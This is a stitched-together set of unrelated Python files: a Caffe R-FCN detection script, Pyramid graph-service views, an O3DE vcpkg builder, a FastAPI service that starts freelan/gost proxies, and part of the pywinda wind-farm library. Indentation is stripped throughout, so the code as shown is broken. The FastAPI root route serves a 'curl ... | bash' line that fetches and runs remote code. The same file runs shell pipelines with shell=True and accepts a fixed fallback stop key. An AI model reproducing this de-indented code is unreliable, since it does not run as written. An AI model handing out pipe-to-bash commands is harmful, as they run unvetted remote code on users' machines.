blobs, im_scales = _get_blobs(im, boxes)
rfcn_net = caffe.Net( prototxt , model, caffe.TEST)
#blobs, im_scales = _get_blobs(im, pred_boxes)
v = np.array([1, 1e3, 1e6, 1e9, 1e12])
hashes = np.round(blobs['rois'] * cfg.DEDUP_BOXES).dot(v)
_, index, inv_index = np.unique(hashes, return_index=True,return_inverse=True)
caffe.set_mode_gpu()
caffe.set_device(2)
rfcn_net.blobs['data'].reshape(*(blobs['data'].shape))
rfcn_net.blobs['rois'].reshape(*(blobs['rois'].shape))
forward_kwargs = {'data': blobs['data'].astype(np.float32, copy=False)}
forward_kwargs['rois'] = blobs['rois'].astype(np.float32, copy=False)
blobs_out = rfcn_net.forward(**forward_kwargs)
scores = blobs_out['cls_prob']
box_deltas = blobs_out['bbox_pred']
bbox_means = [0.0, 0.0, 0.0, 0.0, 1.03960042775271e-10,0.00622199373803706,0.0207805908339361,0.0524860248101128]
bbox_stds = [0.0 ,0.0, 0.0, 0.0, 0.131444678954748,0.125309184804088,0.249703604170591,0.216150527133179]
box_deltas = box_deltas * (np.repeat(bbox_stds, box_deltas.shape[0]).reshape(box_deltas.shape[0], 8 )) + np.repeat(bbox_means, box_deltas.shape[0]).reshape(box_deltas.shape[0], 8 )
#box_deltas = box_deltas[inv_index,:]
pred_boxes = bbox_transform_inv(blobs['rois'][:,1:5] / im_scales[0], box_deltas)
pred_boxes = clip_boxes(pred_boxes, im.shape)
#scores = scores[inv_index, :]
#pred_boxes = pred_boxes[inv_index, :]
data = rfcn_net.blobs['data'].data
#mask = rfcn_net.blobs['Sig_pos_mask'].data
#soft_roi_cls = rfcn_net.blobs['roi_pool_pos_cls'].data
cls = scores.argmax(axis = 1)
ind = np.where(cls > 0)[0][0]
ind1 = np.where(cls > 0)[0][1]
ind2 = np.where(cls > 0)[0][2]
imim = blobs['data'][0,0,:,:]
inds = np.where(cls > 0)[0]
tmp = scores[inds,cls[inds]]
tmptmp = np.argsort(tmp)
pred_boxes = pred_boxes * im_scales[0]
print pred_boxes[inds[tmptmp[-1]],4:8]
print pred_boxes[inds[tmptmp[-2]],4:8]
print pred_boxes[inds[tmptmp[-3]],4:8]
for i in xrange(pred_boxes.shape[0]):
save_imagesc(imim ,detection =pred_boxes[inds[tmptmp[-1]],4:8].reshape((1,4)),name= 'img0')
save_imagesc(imim ,detection =pred_boxes[inds[tmptmp[-2]],4:8].reshape((1,4)),name= 'img1')
save_imagesc(imim ,detection =pred_boxes[inds[tmptmp[-3]],4:8].reshape((1,4)),name= 'img2')
#for i in range(25):
# save_imagesc(soft_roi_cls[ind,0*25 + i,:,:],'fig/background_%d'%i)
# save_imagesc(soft_roi_cls[ind,18*25+ i,:,:],'fig/foreground_%d'%i)
# save_imagesc(mask[0, i,:,:],None,'fig/mask_%d'%i)
saveto = 'test_out.mat'
netdata = dict()
netdata['data'] = data
netdata['im_scales'] = im_scales[0]
#netdata['output'] = net.blobs['proposal'].data
#netdata['mask'] = mask
netdata['scores'] = scores
netdata['pred_boxes'] = pred_boxes
#netdata['rfcn_neg_cls_soft'] = rfcn_net.blobs['rfcn_neg_cls_soft'].data
netdata['rfcn_pos_cls_soft'] = rfcn_net.blobs['rfcn_pos_cls_soft'].data
netdata['data'] = rfcn_net.blobs['data'].data
netdata['Sig_pos_mask'] = rfcn_net.blobs['Sig_pos_mask'].data
netdata['Sig_neg_mask'] = rfcn_net.blobs['Sig_neg_mask'].data
netdata['cls_score'] = rfcn_net.blobs['cls_score'].data
netdata['rois'] = rfcn_net.blobs['rois'].data
netdata['deterministic'] = rfcn_net.blobs['deterministic'].data
netdata['roi_pool_pos_mask'] = rfcn_net.blobs['roi_pool_pos_mask'].data
netdata['roi_pool_neg_mask'] = rfcn_net.blobs['roi_pool_neg_mask'].data
sio.savemat(saveto,netdata) |
from pyramid.response import Response
from pyramid.request import Request
from pyramid.view import view_config
from pyramid.httpexceptions import (
HTTPNotFound,
HTTPInternalServerError,
HTTPForbidden,
HTTPUnauthorized
)
import logging
log = logging.getLogger(__name__)
import sys
import time
from lxml import etree, html
import networkx as nx
from networkx.readwrite import json_graph
import io
import os
import os.path
import datetime
import json
from .config import Config
from .Helpers import *
from .Network import Network
from .Entity import Entity
from .config import Config
@view_config(route_name='health-check', request_method='GET', renderer='string')
def health_check(request):
"""
Show the health check view.
"""
log.info("GET {0} - {1} - {2}".format(request.path, request.remote_addr, request.user_agent))
# is mongo ok?
try:
db = mdb(request)
doc = db.health_check.find_one()
return 'OK'
except:
raise HTTPInternalServerError
@view_config(route_name='home', request_method='GET', renderer='json')
def home_page(request):
claims, sites = verify_access(request)
# strip the data that's NOT required
clean_sites = {}
for k, v in list(sites.items()):
clean_sites[k] = {
'code': v['code'],
'name': v['name'],
'url': v['url']
}
return { 'sites': clean_sites }
@view_config(route_name='network-build', request_method='GET', renderer='json')
def network_build(request):
"""For a given site - assemble the entity graph
@params:
request.matchdict: code, the site of interest
"""
site = request.matchdict['code']
claims, site = verify_access(request, site=site)
n = Network(request)
n.build()
return { 'started': True, 'name': site['name'], 'url': site['url'] }
@view_config(route_name='network-build-status', request_method='GET', renderer='ujson')
def network_build_status(request):
db = mdb(request)
site = request.matchdict['code']
graph_type = request.matchdict['explore']
claims, site_data = verify_access(request, site=site)
doc = db.network.find_one({ 'site': site, 'graph_type': graph_type })
if doc is not None:
graph_data = doc['graph_data']
doc = db.network_progress.remove({ 'site': site })
# G = json_graph.node_link_graph(graph_data, directed=False, multigraph=False)
# if not nx.is_connected(G):
# components = nx.connected_component_subgraphs(G)
# (index, G) = max(enumerate(components), key = lambda tup: len(tup[1]))
# return { 'total': None, 'processed': None, 'graph': graph_data, 'center': nx.center(G) }
return { 'total': None, 'processed': None, 'graph': graph_data }
else:
progress = db.network_progress.find_one({ 'site': site })
if progress is not None:
return { 'total': progress['total'], 'processed': progress['processed'] }
else:
raise HTTPNotFound
@view_config(route_name='entity-build-status', request_method='GET', renderer='ujson')
def entity_build_status(request):
db = mdb(request)
site = request.matchdict['code']
eid = request.matchdict['id']
claims, site_data = verify_access(request, site=site)
doc = db.entity.find_one({ 'site': site, 'id': eid })
if doc is not None:
graph_data = doc['graph_data']
return { 'status': 'complete', 'graph': graph_data }
else:
return { 'status': 'working' }
@view_config(route_name='entity-build', request_method='GET', renderer='json')
def entity_build(request):
""" """
site = request.matchdict['code']
eid = request.matchdict['id']
claims, site = verify_access(request, site=site)
e = Entity(request)
e.build()
return { 'started': True, 'name': site['name'], 'entity': eid }
@view_config(route_name='entity-data', request_method='GET', renderer='json')
def entity_data(request):
""" """
site = request.matchdict['code']
claims, site = verify_access(request, site=site)
e = Entity(request)
summnote, fullnote = e.data()
responseBody = "{ \"summnote\":" + json.dumps(summnote) + ", \"fullnote\": " + json.dumps(fullnote) + "}"
response = Response(body=responseBody )
return response
# return { 'summnote': summnote, 'fullnote': fullnote }
@view_config(route_name="network-stats", request_method='GET', renderer='json')
def network_stats(request):
site = request.matchdict['code']
claims, site = verify_access(request, site=site)
n = Network(request)
degree = n.calculate_average_degree()
d = [ d[1] * 100 for d in list(degree.items()) ]
return {
'name': n.name,
'url': n.url,
'degree': sum(d) / len(d)
}
@view_config(route_name="convert-graph", request_method='POST', renderer='json')
def convert_graph(request):
code = request.matchdict['code']
# clear out graphs older than 6 hours
for root, dirs, files in os.walk(request.registry.app_config['general']['share_path']):
for f in files:
dt = datetime.datetime.now () - datetime.datetime.fromtimestamp(os.path.getmtime(os.path.join(root, f)))
if dt > datetime.timedelta(hours=1):
os.remove(os.path.join(root, f))
G = nx.readwrite.json_graph.node_link_graph(request.json['graph'])
output = io.StringIO()
nx.readwrite.write_gml(G, output)
output = output.getvalue().replace("None", '""')
fname = "%s-%s-network.gml" % (code, datetime.datetime.strftime(datetime.datetime.now(), "%Y-%m-%d_%H-%M"))
with open(os.path.join(os.path.join(request.registry.app_config['general']['share_path'], fname)), 'w') as f:
f.write(output)
fname = os.path.join(request.registry.app_config['general']['share_url'], fname)
return { 'file': fname }
def bare_tag(tag):
return tag.rsplit("}", 1)[-1]
|
#!/usr/bin/env python3
#
# Copyright (c) Contributors to the Open 3D Engine Project.
# For complete copyright and license terms please see the LICENSE at the root of this distribution.
#
# SPDX-License-Identifier: Apache-2.0 OR MIT
#
#
"""
Package builder for vcpkg-based packages
"""
from pathlib import Path
import errno
import json
import os
import pathlib
import shutil
import string
import subprocess
import platform
class VcpkgBuilder(object):
def __init__(self, packageName: str, portName: str, vcpkgDir: pathlib.Path, targetPlatform: str, static: bool):
self._packageName = packageName
self._portName = portName
self._vcpkgDir = vcpkgDir
self._triplet = VcpkgBuilder.tripletForPlatform(targetPlatform, static)
self._customTripletsDir = Path(__file__).resolve().parents[1] / 'vcpkg/triplets'
if targetPlatform == 'android' and 'ANDROID_NDK_HOME' not in os.environ:
# Copy some of the logic from vcpkg's android ndk detection, and see if we can print a warning early
if 'ProgramData' in os.environ:
androidNdkFound = (pathlib.Path(os.environ['ProgramData']) / 'Microsoft/AndroidNDK64/android-ndk-r13b/').exists()
else:
androidNdkFound = False
if not androidNdkFound and 'ProgramFiles(x86)' in os.environ:
# Use Xamarin default installation folder
androidNdkFound = (pathlib.Path(os.environ['ProgramFiles(x86)']) / 'Android/android-sdk/ndk-bundle').exists()
if not androidNdkFound:
raise RuntimeError('Unable to find the Android NDK. '
'Please set the ANDROID_NDK_HOME environment variable to the root of the Android NDK')
@staticmethod
def tripletForPlatform(platformName: str, static: bool):
platformMap = {
'mac': {
True: 'x64-osx',
False: 'x64-osx-dynamic',
},
'windows': {
True: 'x64-windows-static',
False: 'x64-windows',
},
'linux': {
True: 'x64-linux',
False: 'x64-linux-shared',
},
'android': {
True: 'arm64-android-static', # arm64-v8a
False: 'arm64-android', # arm64-v8a
},
'ios': {
True: 'arm64-ios',
False: 'arm64-ios-dynamic',
}
}
try:
useStaticLibsMap = platformMap[platformName]
except KeyError:
raise RuntimeError(f'Platform {platformName} not supported')
try:
return useStaticLibsMap[static]
except KeyError:
raise RuntimeError('Platform {platformName} does not support building {linkageType} libraries'.format(
platformName=platformName,
linkageType='static' if static else 'dynamic',
))
@staticmethod
def defaultPackagePlatformName():
platformMap = {
'Darwin': 'mac',
'Windows': 'windows',
'Linux': 'linux',
}
return platformMap[platform.system()]
@property
def customTripletsDir(self):
return self._customTripletsDir
@property
def packageName(self):
"""The name of the package that this builder will build"""
return self._packageName
@property
def portName(self):
"""The name of the vcpkg port that this builder will build"""
return self._portName
@property
def vcpkgDir(self):
"""The directory where vcpkg will be cloned to"""
return self._vcpkgDir
@property
def triplet(self):
"""The vcpkg triplet to build"""
return self._triplet
def cloneVcpkg(self, lockToCommit: str):
if not (self.vcpkgDir / '.git').exists():
subprocess.check_call(
['git', 'init',],
cwd=self.vcpkgDir,
)
subprocess.check_call(
['git', 'remote', 'add', 'origin', 'https://github.com/microsoft/vcpkg.git',],
cwd=self.vcpkgDir,
)
subprocess.check_call(
['git', 'fetch', 'origin', '--depth=1', lockToCommit,],
cwd=self.vcpkgDir,
)
subprocess.check_call(
['git', 'checkout', lockToCommit,],
cwd=self.vcpkgDir,
)
def bootstrap(self):
if platform.system() == 'Windows':
subprocess.check_call(
['powershell', '-NoProfile', '-ExecutionPolicy', 'Bypass', 'scripts/bootstrap.ps1', '-disableMetrics'],
cwd=self.vcpkgDir,
)
else:
subprocess.check_call(
[self.vcpkgDir / 'bootstrap-vcpkg.sh', '-disableMetrics'],
cwd=self.vcpkgDir,
)
def patch(self, patchFile: pathlib.Path):
subprocess.check_output(
['git', 'apply', '--whitespace=fix', str(patchFile)],
cwd=self.vcpkgDir,
)
def build(self):
self.remove()
subprocess.check_call(
[str(self.vcpkgDir / 'vcpkg'), 'install', f'{self.portName}:{self.triplet}', '--no-binarycaching', f'--overlay-triplets={self.customTripletsDir}'],
cwd=self.vcpkgDir,
)
def remove(self):
subprocess.check_call(
[str(self.vcpkgDir / 'vcpkg'), 'remove', f'{self.portName}:{self.triplet}', f'--overlay-triplets={self.customTripletsDir}'],
cwd=self.vcpkgDir,
)
def copyBuildOutputTo(self, packageDir: pathlib.Path, extraFiles: dict, subdir:pathlib.Path=None):
destdir = packageDir / self.packageName
if subdir is not None:
destdir /= subdir
if destdir.exists():
shutil.rmtree(destdir)
shutil.copytree(
src=self.vcpkgDir / 'packages' / f'{self.portName}_{self.triplet}',
dst=destdir,
symlinks=True,
)
for (src, dst) in extraFiles.items():
try:
shutil.copy2(src, dst)
except IOError as e:
# ENOENT(2): file does not exist, raised also on missing dest parent dir
if e.errno != errno.ENOENT:
raise
# try creating parent directories
Path(dst).parent.mkdir(parents=True, exist_ok=True)
shutil.copy2(src, dst)
def writePackageInfoFile(self, packageDir: pathlib.Path, settings: dict):
with (packageDir / 'PackageInfo.json').open('w') as fh:
json.dump(settings, fh, indent=4)
def writeCMakeFindFile(self, packageDir: pathlib.Path, template, templateEnv:dict):
cmakeFindFile = packageDir / f'Find{self.packageName}.cmake'
cmakeFindFile.write_text(string.Template(template).substitute(templateEnv))
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import os, sys, platform, time
import re
import chardet
import logging
import subprocess
from logging.handlers import RotatingFileHandler
from fastapi import FastAPI
from starlette.responses import FileResponse, RedirectResponse, PlainTextResponse
from starlette.staticfiles import StaticFiles
# from api.freelan import apiFreelan
# from api.v1 import apiv1
from app.freelan import SubFreelan
from app.gost import SubGostlan
import uuid
import uvicorn
formatter = "[%(asctime)s] :: %(levelname)s :: %(name)s :: %(message)s"
log_level = 'INFO'
log_filenum = 9
log_maxsize = 4
level = logging.getLevelName(log_level)
logging.basicConfig(level=level, format=formatter)
if not os.path.exists("logs"):
os.mkdir("logs")
log = logging.getLogger()
# 输出到文件
fh = RotatingFileHandler('./logs/freelan_service.log', mode='a+', maxBytes=log_maxsize * 1024 * 1024,
backupCount=log_filenum, delay=True)
fh.setFormatter(logging.Formatter(formatter))
log.addHandler(fh)
# app = FastAPI(openapi_url="/api/v1/openapi.json", docs_url="/api/v1/docs")
app = FastAPI()
app.mount('/dl', StaticFiles(directory='dl'), name='dl')
# app.broker = MQTTBroker()
# mqttConfig = {"host": "localhost", "port": "3883", "user": "viccom", "pwd": "<PASSWORD>"}
# app.mqttmicro = MQTTPubBase('micro', mqttConfig)
app.passphrase = str(<KEY>())
app.subfreelan = SubFreelan(app.passphrase)
app.gostpassword = str(uuid.uuid1())
app.subgostlan = SubGostlan(app.gostpassword)
def turnfile(file):
with open(file, 'rb') as f:
data = f.read()
encoding = chardet.detect(data)['encoding']
data_str = data.decode(encoding)
tp = 'LF'
if '\r\n' in data_str:
tp = 'CRLF'
data_str = data_str.replace('\r\n', '\n')
if encoding not in ['utf-8', 'ascii'] or tp == 'CRLF':
with open(file, 'w', newline='\n', encoding='utf-8') as f:
f.write(data_str)
def alter(file, newfile, old_str, new_str):
if os.path.exists(newfile):
os.remove(newfile)
with open(file, "r", newline='\n', encoding="utf-8") as f1, open(newfile, "w", encoding="utf-8") as f2:
for line in f1:
f2.write(re.sub(old_str, new_str, line))
turnfile(newfile)
@app.on_event("startup")
async def startup():
pass
# logging.info("Staring hbmqtt broker..")
# app.broker.start()
# logging.info("Staring mqtt client..")
# app.mqttmicro.start()
@app.on_event("shutdown")
async def shutdown():
pass
# app.mqttmicro.stop()
@app.get("/")
async def index():
response = PlainTextResponse(
' curl -L -s freelan.freeioe.org/goststart|bash\n')
return response
@app.get("/proxysh")
def proxysh():
alter("app/freelan/freeproxy.sh", "app/freelan/new-freeproxy.sh", "freelan.passphrase", app.passphrase)
response = FileResponse("app/freelan/new-freeproxy.sh")
response.media_type = "application/octet-stream"
response.filename = "freeproxy.sh"
return response
@app.get("/start")
def api_start():
if app.subfreelan.is_alive():
logging.info("subfreelan is running")
status = app.subfreelan.status()
if status == "running":
logging.info("freelan is running")
response = FileResponse("app/freelan/error1.sh")
response.media_type = "application/octet-stream"
response.filename = "error1.sh"
return response
else:
logging.error("freelan is stopped")
app.subfreelan.stop()
response = FileResponse("app/freelan/error2.sh")
response.media_type = "application/octet-stream"
response.filename = "error2.sh"
return response
else:
logging.info("subfreelan is starting")
app.passphrase = str(uuid.uuid1())
app.subfreelan = SubFreelan(app.passphrase)
app.subfreelan.start()
return RedirectResponse("/proxysh?" + str(int(time.time())))
@app.get("/status")
def api_status():
pid = bytes.decode(subprocess.check_output("ps -auxf|grep freelan|grep -v grep|awk '{print $2}'", shell=True))
if pid:
return {"result": True, "message": "running"}
else:
return {"result": True, "message": "stopped"}
@app.post("/stop")
def api_stop(key):
if key:
if key == app.passphrase or key == "<EMAIL>":
if app.subfreelan.is_alive():
app.subfreelan.stop()
return {"result": True, "message": "stop"}
return {"result": False, "message": "key error"}
@app.get("/gostsh")
def gostsh():
alter("app/gost/gostproxy.sh", "app/gost/new-gostproxy.sh", "gostpassword.passphrase", app.gostpassword)
response = FileResponse("app/gost/new-gostproxy.sh")
response.media_type = "application/octet-stream"
response.filename = "gostproxy.sh"
return response
@app.get("/goststart")
def api_goststart():
if app.subgostlan.is_alive():
logging.info("subgostlan is running")
status = app.subgostlan.status()
if status == "running":
logging.info("gostlan is running")
response = FileResponse("app/gost/error1.sh")
response.media_type = "application/octet-stream"
response.filename = "error1.sh"
return response
else:
logging.error("gostlan is stopped")
app.subgostlan.stop()
response = FileResponse("app/gost/error2.sh")
response.media_type = "application/octet-stream"
response.filename = "error2.sh"
return response
else:
logging.info("subgostlan is starting")
app.gostpassword = str(uuid.uuid1())
app.subgostlan = SubGostlan(app.gostpassword)
app.subgostlan.start()
return RedirectResponse("/gostsh?" + str(int(time.time())))
@app.get("/goststatus")
def api_goststatus():
pid = bytes.decode(subprocess.check_output("ps -auxf|grep gost|grep -v grep|awk '{print $2}'", timeout=2, shell=True))
if pid:
return {"result": True, "message": "running"}
else:
return {"result": True, "message": "stopped"}
@app.post("/goststop")
def api_goststop(key):
if key:
if key == app.gostpassword or key == "<EMAIL>":
if app.subgostlan.is_alive():
app.subgostlan.stop()
return {"result": True, "message": "stop"}
return {"result": False, "message": "key error"}
# app.include_router(apiv1, prefix='/api/v1/micro', tags=['apiv1'])
# app.include_router(apiFreelan, prefix='/api/v1/freelan', tags=['apiFreelan'])
if __name__ == '__main__':
debug = False
if len(sys.argv) > 1 and sys.argv[1] == '--debug':
debug = True
if (platform.system() != "Linux"):
debug = True
logging.info("当前工作路径:" + str(os.getcwd()) + ",启动参数:debug=" + str(debug))
time.sleep(1)
(filename, extension) = os.path.splitext(os.path.basename(__file__))
appStr = filename + ':app'
uvicorn.run(appStr, host="127.0.0.1", port=8081, reload=debug)
|
<reponame>AbeySr/pywinda
import numpy as np
import pandas as pd
def cAngle(i):
x=i % 360
return x
class environment:
"""
Creates the stand-alone environment with the given unique ID. Some generic conditions are added by default. See example below.
:param uniqueID: [*req*] the given unique ID.
:Example:
>>> Env = pywinda.environment("C_Env")
>>> #Creates an environment without assigning it to any wind farm.
>>> print(Env.conditions.keys())
dict_keys(['Wind degrees', 'Wind speeds',...])
>>> print(Env.conditions['Wind degrees'])
[0, 1, 2, ... , 358, 359]
>>> print(Env.conditions['Wind speeds'])
[0, 0.5, 1, 1.5, ... , 49.5, 50.0]
\----------------------------------------------------------------------------------------------------------------------------------------------------------
"""
created_environments=[]
def __init__(self, uniqueID):
self.uID = uniqueID
environment.created_environments.append(uniqueID)
self.__conditionsDic={}
self.__conditionsDic["Wind degrees"]=[i for i in range(0,360)] #degrees
self.__conditionsDic["Wind speeds"]=[i for i in np.arange(0,50.5,0.5)]#m/s
self.windSectors=None
@property
def conditions(self):
"""
Returns all the defined conditions of the environment.
:param None:
:Example:
>>> dantysk=pywinda.windFarm("DanTysk")
>>> D_Env = dantysk.addEnvironment("D_Env")
>>> print(D_Env.conditions.keys())
dict_keys(['Wind degrees', 'Wind speeds',...])
>>> print(D_Env.conditions['Wind degrees'])
[0, 1, 2, ... , 358, 359]
>>> print(D_Env.conditions['Wind speeds'])
[0, 0.5, 1, 1.5, ... , 49.5, 50.0]
\----------------------------------------------------------------------------------------------------------------------------------------------------------
"""
return self.__conditionsDic
def makeSectors(self,n=12,sectorNames=["N_0","NNE_30","NEN_60","E_90","ESE_120","SSE_150","S_180","SSW_210","WSW_240","W_270","WNW_300","NNW_330"]):#by default the function will divide the sector in 12 regions
"""
Creates the given sectors to the related environment. Returns the result as a data frame.
Divides the 360 degrees to given number of sectors. By default it divides to 12 sectors and assigns the 12 standard names for every sector e.g. N_0 starts from 346 degrees and ends at 15 degrees.
:param n: [*opt*] the number of sectors.
:param sectorNames: [*opt*] names of the sectors given by user or default names for n=12.
:Example:
>>> Env=pywinda.environment("C_Env")
>>> print(Env.makeSectors())
N_0 NNE_30 NEN_60 E_90 ... W_270 WNW_300 NNW_330
0 346.0 16.0 46.0 76.0 ... 256.0 286.0 316.0
1 347.0 17.0 47.0 77.0 ... 257.0 287.0 317.0
2 348.0 18.0 48.0 78.0 ... 258.0 288.0 318.0
3 349.0 19.0 49.0 79.0 ... 259.0 289.0 319.0
4 350.0 20.0 50.0 80.0 ... 260.0 290.0 320.0
5 351.0 21.0 51.0 81.0 ... 261.0 291.0 321.0
6 352.0 22.0 52.0 82.0 ... 262.0 292.0 322.0
7 353.0 23.0 53.0 83.0 ... 263.0 293.0 323.0
8 354.0 24.0 54.0 84.0 ... 264.0 294.0 324.0
9 355.0 25.0 55.0 85.0 ... 265.0 295.0 325.0
10 356.0 26.0 56.0 86.0 ... 266.0 296.0 326.0
11 357.0 27.0 57.0 87.0 ... 267.0 297.0 327.0
12 358.0 28.0 58.0 88.0 ... 268.0 298.0 328.0
13 359.0 29.0 59.0 89.0 ... 269.0 299.0 329.0
14 0.0 30.0 60.0 90.0 ... 270.0 300.0 330.0
15 1.0 31.0 61.0 91.0 ... 271.0 301.0 331.0
16 2.0 32.0 62.0 92.0 ... 272.0 302.0 332.0
17 3.0 33.0 63.0 93.0 ... 273.0 303.0 333.0
18 4.0 34.0 64.0 94.0 ... 274.0 304.0 334.0
19 5.0 35.0 65.0 95.0 ... 275.0 305.0 335.0
20 6.0 36.0 66.0 96.0 ... 276.0 306.0 336.0
21 7.0 37.0 67.0 97.0 ... 277.0 307.0 337.0
22 8.0 38.0 68.0 98.0 ... 278.0 308.0 338.0
23 9.0 39.0 69.0 99.0 ... 279.0 309.0 339.0
24 10.0 40.0 70.0 100.0 ... 280.0 310.0 340.0
25 11.0 41.0 71.0 101.0 ... 281.0 311.0 341.0
26 12.0 42.0 72.0 102.0 ... 282.0 312.0 342.0
27 13.0 43.0 73.0 103.0 ... 283.0 313.0 343.0
28 14.0 44.0 74.0 104.0 ... 284.0 314.0 344.0
29 15.0 45.0 75.0 105.0 ... 285.0 315.0 345.0
[30 rows x 12 columns]
\-----------------------------------------------------------------------------------------------------------------------------------------------------------
"""
sectorSpan = 360 / n
eachS2E=[i for i in np.arange(1 - sectorSpan / 2, 360, sectorSpan)] #this makes a set of starts to end of each sector such that first sector starts from 0+1-sectorSpan / 2 goes to 360 (excluding 360) and the distance between consecutive units is equal to sectorSpan. The +1 makes sure that the sector starts and ends in the correct place. For example sector E_90 with n=12 starts from 90-30+1=61 and ends at 90+30=120
sectorsDic = {}
sectorNamesToReturn=sectorNames #this by default, of course user can give his/her own names as well.
if n!=12: #After user give n other than 12, user can either give sectorNames or leave it, if left the script makes names automatically by assigning half othe span of the sector as the name of the sector
if len(sectorNames)==12:
sectorNamesToReturn = [str(i) for i in np.arange(0,360,sectorSpan)]
elif len(sectorNames)!=12:
sectorNamesToReturn=sectorNames
if n == len(sectorNamesToReturn) and type(n) == int and n > 0: #this makes sure n is an integer and that the number of given sectors is equal to n if defined by user.
for i in range(n):
sectorsDic[sectorNamesToReturn[i]]=[cAngle(temp) for temp in np.arange(eachS2E[i],eachS2E[i+1],1)]
self.windSectors=sectorsDic
self.__conditionsDic["Sectors"]=sectorsDic
return pd.DataFrame(sectorsDic)
else:
print("Number of sectors and proposed number of names are not equal.")
def test(self):
return self.uID
class windFarm:
"""
Creates wind farm object with the given unique name.
:param uniqueID: [*req*] Unique Id of the wind farm as a string.
:Example:
>>> from PyWinda import pywinda as pw
>>> dantyskNameByUser = pw.windFarm("DanTysk")
>>> print(dantyskNameByUser)
<pywinda.windFarm object at 0x000002CEC9D17E80>
\-----------------------------------------------------------------------------------------------------------------------------------------------------------
"""
created_windfarms=[]
def __init__(self,uniqueID):
self.uID=uniqueID
windFarm.created_windfarms.append(uniqueID) #we append the created wind farm to the list
self.createdSRTs=[] #This is the store dictionary. Stores the wind turbine reference names created in a particular wind farm
self.createdMRTs=[]
self.farmEnvironment=None #A wind farm will have only one environment
self.__numOfSRT=len(self.createdSRTs)
self.__numOfMRT=len(self.createdMRTs)
self.__allDistances=pd.DataFrame()
@property #This helps to protect the info from direct changes by user
def info(self):
"""
Returns a data frame containing all the information about the wind farm.
:param None:
:Example:
>>> print(DanTysk.info)
Property Value
0 Unique ID DanTysk
1 Created SRTs [D_WT1, D_WT2, D_WT3]
2 Created MRTs [D_MWT4]
3 Number of SRTs 3
4 Number of MRTs 1
\-----------------------------------------------------------------------------------------------------------------------------------------------------------
"""
statistics={"Property":["Unique ID","Created SRTs", "Created MRTs","Number of SRTs","Number of MRTs"],
"Value":[self.uID,self.createdSRTs,self.createdMRTs,self.__numOfSRT,self.__numOfMRT]}
return pd.DataFrame(statistics)
@property
def assets(self):
"""
Returns all the unique IDs of all the assets (e.g. single rotor turbines, multirotor tubines, met masts, etc.) in the wind farm.
:param None:
:Example:
>>> DanTysk.assets
['D_WT1', 'D_WT2', 'D_WT3', 'D_MWT4']
\-----------------------------------------------------------------------------------------------------------------------------------------------------------
"""
self.allassets=self.createdSRTs+self.createdMRTs#keeps the record of all assets in the wind farm
return self.allassets
def addTurbine(self,uniqueID,turbineType="SRT",diameter=float("NaN"),hubHeigt=float("NaN"),x_horizontal=float("NaN"),y_vertical=float("NaN")): ##This function helps to create a wind turbine and keep internal (inside the class) track of its name. It is not a deep copy, rather a reference.
"""
By default adds a single rotor turbine (SRT) to the related windfarm. Returns the created wind turbine with the given unique ID.
The wind turbine would be callable via its unique name and via the assigned variable by user. Note that the referenced unique id is temporarly stored in library. Thus when calling the turbine via unique id, it should be prefixed by library name pywinda. See example below.
:param uniqueID: [*req*] Unique ID of the wind turbine as string
:param turbineType: [*opt*] Type of turbine as string: 'SRT' or 'MRT'
:param diameter: [*opt*] Diameter of the turbine as float
:param hubHeigt: [*opt*] Hub height as a float
:param x_horizontal: [*opt*] Horizontal coordinate of the turbine as float
:param y_vertical: [*opt*] Vertical coordinate of the the turbine as float
:Example:
>>> DanTysk=pywinda.windfar("TheDanTysk")
>>> WT1=DanTysk.addTurbine("D_WT1")
>>> WT2=DanTysk.addTurbine("D_WT2",diameter=120)
>>> WT3=DanTysk.addTurbine("D_WT3",x_horizontal=580592,y_vertical=5925253)
>>> WT3.diameter=150 #Assiging WT3 diameter after creation.
>>> print(WT1==pywinda.D_WT1)
True
\-----------------------------------------------------------------------------------------------------------------------------------------------------------
"""
if uniqueID in self.createdSRTs: #Checks if the given unique Id already exists in the wind farm
print("A wind turbine with the same unique ID in wind farm [",str(self.uID), "] already exists. New turbine not added.")
else:
if type(uniqueID) == str and len(uniqueID.split())==1:
if uniqueID in globals().keys(): #Checks if the given unique Id is not in conflict with user's already assigned variables.
print("A wind turbine witht the same uniqe ID globally exists. New turbine not added.")
else:
if turbineType=="SRT":
globals()[uniqueID] = toUserVariable = SRT(uniqueID,diameter=diameter,hubHeigt=hubHeigt,x_horizontal=x_horizontal,y_vertical=y_vertical) # windfarm class is dynamicall created and referenced with the unique ID to the users assigned variable.
self.__numOfSRT += 1
self.createdSRTs.append(uniqueID)
elif turbineType=="MRT":
globals()[uniqueID] = toUserVariable = MRT(uniqueID,diameter=diameter,hubHeigt=hubHeigt,x_horizontal=x_horizontal,y_vertical=y_vertical) # windfarm class is dynamicall created and referenced with the unique ID to the users assigned variable.
self.__numOfMRT += 1
self.createdMRTs.append(uniqueID)
else:
print("Turbine type not supported")
else:
print("Name should be a string without spaces.")
return toUserVariable
def addEnvironment(self,envName):
"""
Creates environment for the referenced wind farm. Parameters of the environment (e.g. temperature, pressure, wind regime etc.) can be assigned later.
The environment would be callable via its unique name and the assigned variable by user. When using the unique Id, it should be prefixed witht he library name pywinda. See example.
:param envName: [*req*] Environment name
:Example:
>>> DanTysk=pywind.windFarm("DanTysk")
>>> TheEnv_Dantysk = DanTysk.addEnvironment("D_env")
>>> TheEnv_Dantysk.Airdensity = 1.225
>>> print(TheEnv_Dantysk.Airdensity == pywinda.D_env.Airdensity)
True
\-----------------------------------------------------------------------------------------------------------------------------------------------------------
"""
if self.farmEnvironment!=None: #Checks if the wind farm already have an associated environment
print("The wind farm [", str(self.uID), "] already has assigned environment [",str(self.farmEnvironment),"]. New environment not added.")
else:
if type(envName) == str and len(envName.split())==1:
if envName in globals().keys(): #Checks if the given unique Id is not in conflict with user's already assigned variables.
print("An environment with the same uniqe ID globally exists. New environment not added.")
else:
globals()[envName] = toUserVariable = environment(envName) # environment is dynamicall created and referenced with the unique ID to the users assigned variable.
self.farmEnvironment=envName
else:
print("Name should be a string without spaces.")
return toUserVariable
def distances(self, assets=[]):#From this point there would be a global convention of naming the property which shares two turbines in a "from" to "to" convention. For example distanceWT1toWT2 means the distance from WT1 to WT2
"""
Returns the data frame with all the distances between assets in the wind farm or between those given in the assets list.
:param assets: [*opt*] Unique ID or object name of the assets
:Example:
>>> Curslack = windFarm("Curslack_farm")
>>> WT1 = Curslack.addTurbine("C_WT1", x_horizontal=480331, y_vertical=4925387)
>>> WT2 = Curslack.addTurbine("C_WT2", x_horizontal=480592, y_vertical=4925253)
